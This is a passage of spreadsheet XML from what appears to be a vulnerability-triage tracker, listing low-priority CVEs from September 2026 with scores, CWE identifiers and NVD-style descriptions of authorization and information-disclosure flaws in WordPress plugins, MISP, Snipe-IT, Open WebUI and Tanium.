      <c r="F1126" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1126" s="5" t="inlineStr"/>
      <c r="H1126" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1126" s="5" t="inlineStr"/>
      <c r="J1126" s="5" t="inlineStr"/>
      <c r="K1126" s="5" t="inlineStr"/>
      <c r="L1126" s="5" t="inlineStr"/>
      <c r="M1126" s="5" t="inlineStr"/>
      <c r="N1126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1126" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1126" s="5" t="inlineStr"/>
      <c r="Q1126" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1126" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not have capability or nonce checks on some of its A/B testing actions, allowing any authenticated user, such as a subscriber, to overwrite the cookie banner configuration shown to every visitor and to irreversibly reset the stored A/B test results.</t>
        </is>
      </c>
      <c r="S1126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82185</t>
        </is>
      </c>
    </row>
    <row r="1127">
      <c r="A1127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85132</t>
        </is>
      </c>
      <c r="D1127" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1127" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1127" s="5" t="inlineStr"/>
      <c r="H1127" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1127" s="5" t="inlineStr"/>
      <c r="J1127" s="5" t="inlineStr"/>
      <c r="K1127" s="5" t="inlineStr"/>
      <c r="L1127" s="5" t="inlineStr"/>
      <c r="M1127" s="5" t="inlineStr"/>
      <c r="N1127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1127" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1127" s="5" t="inlineStr"/>
      <c r="Q1127" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1127" s="5" t="inlineStr">
        <is>
          <t>The WPLP Cookie Consent  WordPress plugin before 4.4.2 does not perform nonce or capability checks on one of its cookie scanner AJAX actions, allowing any authenticated user, such as a subscriber, to read back the automated scan schedule the administrator configured.</t>
        </is>
      </c>
      <c r="S1127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85132</t>
        </is>
      </c>
    </row>
    <row r="1128">
      <c r="A1128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8615</t>
        </is>
      </c>
      <c r="D1128" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1128" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1128" s="5" t="inlineStr"/>
      <c r="H1128" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1128" s="5" t="inlineStr"/>
      <c r="J1128" s="5" t="inlineStr"/>
      <c r="K1128" s="5" t="inlineStr"/>
      <c r="L1128" s="5" t="inlineStr"/>
      <c r="M1128" s="5" t="inlineStr"/>
      <c r="N1128" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1128" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1128" s="5" t="inlineStr"/>
      <c r="Q1128" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1128" s="5" t="inlineStr">
        <is>
          <t>The Reviso Exporter for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check and missing nonce verification on the disconnect_callback() function in versions up to, and including, 1.2.3. The function is registered to the 'wp_ajax_wcefr-disconnect' AJAX action and unconditionally calls delete_option('wcefr-agt'), which removes the Reviso Agreement Grant Token used to authenticate API calls. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's stored Agreement Grant Token, breaking the connection between WooCommerce and the Reviso service.</t>
        </is>
      </c>
      <c r="S1128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8615</t>
        </is>
      </c>
    </row>
    <row r="1129">
      <c r="A1129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1129" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86342</t>
        </is>
      </c>
      <c r="D1129" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1129" s="5" t="inlineStr"/>
      <c r="H1129" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1129" s="5" t="inlineStr"/>
      <c r="J1129" s="5" t="inlineStr"/>
      <c r="K1129" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L1129" s="5" t="inlineStr"/>
      <c r="M1129" s="5" t="inlineStr"/>
      <c r="N1129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1129" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1129" s="5" t="inlineStr"/>
      <c r="Q1129" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R1129" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain improper authorization checks in the freetext feed preview functionality. The preview performed correlation lookups against attributes from events without applying the requesting user's ACL, allowing restricted event correlations and associated event information to be exposed to users who could not otherwise access those events. The vulnerable queries were scoped only by attribute values and deletion status rather than MISP's event, organization, sharing-group, attribute, and object-level access controls.
The same preview functionality also returned cross-feed correlation information without properly restricting the feed list to feeds visible to the caller. This exposed metadata for feeds that were not marked lookup_visible; one affected response additionally included the configured feed URL even though that value was not required by the feature.
The fixes apply the caller's ACL to attribute correlation searches, remove feed URLs from correlation results, restrict cross-feed results according to feed visibility, and correct host-organization ID comparison so the authorization rules are applied consistently.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86342</t>
        </is>
      </c>
    </row>
    <row r="1130">
      <c r="A1130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1130" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86417</t>
        </is>
      </c>
      <c r="D1130" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1130" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1130" s="5" t="inlineStr"/>
      <c r="H1130" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1130" s="5" t="inlineStr"/>
      <c r="J1130" s="5" t="inlineStr"/>
      <c r="K1130" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L1130" s="5" t="inlineStr"/>
      <c r="M1130" s="5" t="inlineStr"/>
      <c r="N1130" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1130" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1130" s="5" t="inlineStr"/>
      <c r="Q1130" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="R1130" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP inconsistently enforced email-address visibility in DashboardsController::listTemplates().
The query always fetched User.email, while redaction happened only inside the non-REST rendering branch. As a result, the same authenticated user who saw redacted data in the normal HTML interface could request the REST/JSON representation and receive template owners’ email addresses without the intended privilege check.
The fix moves the decision to a centralized User::canSeeEmails() authorization helper. Email addresses are now fetched only when the requester is a site administrator or the instance explicitly enables Security.disclose_user_emails. The same helper is also reused by other dashboard widgets to keep email-disclosure policy consistent.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1130" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86417</t>
        </is>
      </c>
    </row>
    <row r="1131">
      <c r="A1131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1131" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1131" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86441</t>
        </is>
      </c>
      <c r="D1131" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1131" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1131" s="5" t="inlineStr"/>
      <c r="H1131" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1131" s="5" t="inlineStr"/>
      <c r="J1131" s="5" t="inlineStr"/>
      <c r="K1131" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L1131" s="5" t="inlineStr"/>
      <c r="M1131" s="5" t="inlineStr"/>
      <c r="N1131" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1131" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1131" s="5" t="inlineStr"/>
      <c r="Q1131" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-862</t>
        </is>
      </c>
      <c r="R1131" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain inconsistent authorization checks across dashboard widgets that display organisation information.
Several organisation-related widgets did not honor Security.hide_organisation_index_from_users. As a result, authenticated users without the perm_sharing_group permission could enumerate organisations even though the normal organisation index was intentionally hidden from them.
The affected widgets included paths that:
  *  
returned organisation names and identifiers;
  *  
could expose additional organisation database fields through JSON export because unrestricted find('all') queries fetched full rows;
  *  
accepted limit=0 or negative values in a way that could effectively remove the result limit and return the entire organisation table.
A related organisation-contributor leaderboard also ignored the same visibility setting. Its handler counted Event.orgc_id across the entire event table and mapped those IDs to organisation names, revealing every organisation with events regardless of whether the caller could see any of those events. The fix withdraws this widget entirely for users who lack organisation-index visibility.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1131" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86441</t>
        </is>
      </c>
    </row>
    <row r="1132">
      <c r="A1132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1132" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1132" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86451</t>
        </is>
      </c>
      <c r="D1132" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1132" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1132" s="5" t="inlineStr"/>
      <c r="H1132" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1132" s="5" t="inlineStr"/>
      <c r="J1132" s="5" t="inlineStr"/>
      <c r="K1132" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L1132" s="5" t="inlineStr"/>
      <c r="M1132" s="5" t="inlineStr"/>
      <c r="N1132" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1132" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1132" s="5" t="inlineStr"/>
      <c r="Q1132" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="R1132" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP allow authenticated users to retrieve object-reference records by UUID through EventGraphTool::get_reference_data() without first checking whether the requester is authorized to view the object the reference belongs to.
The vulnerable code queried ObjectReference.uuid directly and returned the matching row whenever it existed. Because no parent-object ACL was applied, a user who knew or obtained a reference UUID could retrieve information associated with an object outside their normal access scope. The commit explicitly states that any object reference could be returned by UUID without authorizing its parent object.
The fix retrieves the referenced object's object_id and calls fetchObjectSimple() with the current user. If the user cannot access that parent object, MISP now returns NotFoundException instead of exposing the reference.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S1132" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86451</t>
        </is>
      </c>
    </row>
    <row r="1133">
      <c r="A1133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1133" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86769</t>
        </is>
      </c>
      <c r="D1133" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1133" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1133" s="5" t="inlineStr"/>
      <c r="H1133" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1133" s="5" t="inlineStr"/>
      <c r="J1133" s="5" t="inlineStr"/>
      <c r="K1133" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1133" s="5" t="inlineStr"/>
      <c r="M1133" s="5" t="inlineStr"/>
      <c r="N1133" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1133" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1133" s="5" t="inlineStr"/>
      <c r="Q1133" s="5" t="inlineStr">
        <is>
          <t>CWE-282</t>
        </is>
      </c>
      <c r="R1133" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT versions before 8.7.0 contain an improper ownership management vulnerability in the consumables checkout API endpoint that records the checkout target user's id in the created_by column instead of the authenticated caller's id. Authenticated attackers with consumables.checkout permission can perform checkouts that result in misattributed audit trail entries in the consumables_users pivot table, obscuring which operator performed the action.</t>
        </is>
      </c>
      <c r="S1133" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86769</t>
        </is>
      </c>
    </row>
    <row r="1134">
      <c r="A1134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1134" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87012</t>
        </is>
      </c>
      <c r="D1134" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1134" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1134" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1134" s="5" t="inlineStr"/>
      <c r="H1134" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1134" s="5" t="inlineStr"/>
      <c r="J1134" s="5" t="inlineStr"/>
      <c r="K1134" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1134" s="5" t="inlineStr"/>
      <c r="M1134" s="5" t="inlineStr"/>
      <c r="N1134" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1134" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1134" s="5" t="inlineStr"/>
      <c r="Q1134" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-754</t>
        </is>
      </c>
      <c r="R1134" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.1, backend/open_webui/models/calendar.py stored the calendar event meta.alert_minutes value without type validation and the shared upcoming-event scheduler compared that value numerically. An authenticated user with the calendar permission could store a non-numeric alert_minutes value that raised an exception and aborted the instance-wide alert pass, suppressing all users' reminders while the event remained in the lookahead window. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1134" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87012</t>
        </is>
      </c>
    </row>
    <row r="1135">
      <c r="A1135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1135" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87013</t>
        </is>
      </c>
      <c r="D1135" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1135" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1135" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1135" s="5" t="inlineStr"/>
      <c r="H1135" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1135" s="5" t="inlineStr"/>
      <c r="J1135" s="5" t="inlineStr"/>
      <c r="K1135" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1135" s="5" t="inlineStr"/>
      <c r="M1135" s="5" t="inlineStr"/>
      <c r="N1135" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1135" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1135" s="5" t="inlineStr"/>
      <c r="Q1135" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="R1135" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.10.0 until 0.11.1, POST /api/v1/folders/{id}/update/parent allowed a user to place a folder under itself or one of its descendants, while the folder tree walks used by DELETE /api/v1/folders/{id} and POST /api/v1/folders/{id}/read did not track visited folder identifiers. An authenticated user could persist a parent cycle and start a request that consumed CPU and memory indefinitely, with the condition remaining stored until repaired. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1135" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87013</t>
        </is>
      </c>
    </row>
    <row r="1136">
      <c r="A1136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1136" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87017</t>
        </is>
      </c>
      <c r="D1136" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1136" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1136" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1136" s="5" t="inlineStr"/>
      <c r="H1136" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1136" s="5" t="inlineStr"/>
      <c r="J1136" s="5" t="inlineStr"/>
      <c r="K1136" s="5" t="inlineStr">
        <is>
          <t>openwebui:open_webui</t>
        </is>
      </c>
      <c r="L1136" s="5" t="inlineStr"/>
      <c r="M1136" s="5" t="inlineStr"/>
      <c r="N1136" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1136" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1136" s="5" t="inlineStr"/>
      <c r="Q1136" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-863</t>
        </is>
      </c>
      <c r="R1136" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.7.0 until 0.11.1, the built-in knowledge search tool passed the caller's readable knowledge identifiers through a metadata filter, but the search methods in eleven shipped vector backends ignored that filter. An authenticated user on an affected backend could enumerate the identifiers, names, and descriptions of inaccessible knowledge bases from the shared collection, although the associated document text remained in separate collections. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1136" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87017</t>
        </is>
      </c>
    </row>
    <row r="1137">
      <c r="A1137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1137" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87019</t>
        </is>
      </c>
      <c r="D1137" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1137" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1137" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1137" s="5" t="inlineStr"/>
      <c r="H1137" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1137" s="5" t="inlineStr"/>
      <c r="J1137" s="5" t="inlineStr"/>
      <c r="K1137" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1137" s="5" t="inlineStr"/>
      <c r="M1137" s="5" t="inlineStr"/>
      <c r="N1137" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1137" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1137" s="5" t="inlineStr"/>
      <c r="Q1137" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R1137" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1137" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87019</t>
        </is>
      </c>
    </row>
    <row r="1138">
      <c r="A1138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1138" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87032</t>
        </is>
      </c>
      <c r="D1138" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1138" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1138" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1138" s="5" t="inlineStr"/>
      <c r="H1138" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1138" s="5" t="inlineStr"/>
      <c r="J1138" s="5" t="inlineStr"/>
      <c r="K1138" s="5" t="inlineStr"/>
      <c r="L1138" s="5" t="inlineStr"/>
      <c r="M1138" s="5" t="inlineStr"/>
      <c r="N1138" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1138" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1138" s="5" t="inlineStr"/>
      <c r="Q1138" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1138" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an information disclosure vulnerability in Tanium Server.</t>
        </is>
      </c>
      <c r="S1138" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87032</t>
        </is>
      </c>
    </row>
    <row r="1139">
      <c r="A1139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1139" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87035</t>
        </is>
      </c>
      <c r="D1139" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1139" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1139" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1139" s="5" t="inlineStr"/>
      <c r="H1139" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1139" s="5" t="inlineStr"/>
      <c r="J1139" s="5" t="inlineStr"/>
      <c r="K1139" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1139" s="5" t="inlineStr"/>
      <c r="M1139" s="5" t="inlineStr"/>
      <c r="N1139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1139" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1139" s="5" t="inlineStr"/>
      <c r="Q1139" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R1139" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an information disclosure vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87035</t>
        </is>
      </c>
    </row>
    <row r="1140">
      <c r="A1140" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87046</t>
        </is>
      </c>
      <c r="D1140" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1140" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1140" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G1140" s="5" t="inlineStr"/>
      <c r="H1140" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1140" s="5" t="inlineStr"/>
      <c r="J1140" s="5" t="inlineStr"/>
      <c r="K1140" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L1140" s="5" t="inlineStr"/>
      <c r="M1140" s="5" t="inlineStr"/>
      <c r="N1140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1140" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1140" s="5" t="inlineStr"/>
      <c r="Q1140" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1140" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an improper access controls vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S1140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87046</t>
        </is>
      </c>
    </row>
    <row r="1141">
      <c r="A1141" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87449</t>
        </is>
      </c>
      <c r="D1141" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E1141" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1141" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1141" s="5" t="inlineStr"/>
      <c r="H1141" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1141" s="5" t="inlineStr"/>
      <c r="J1141" s="5" t="inlineStr"/>
      <c r="K1141" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1141" s="5" t="inlineStr"/>
      <c r="M1141" s="5" t="inlineStr"/>
      <c r="N1141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1141" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1141" s="5" t="inlineStr"/>
      <c r="Q1141" s="5" t="inlineStr">
        <is>
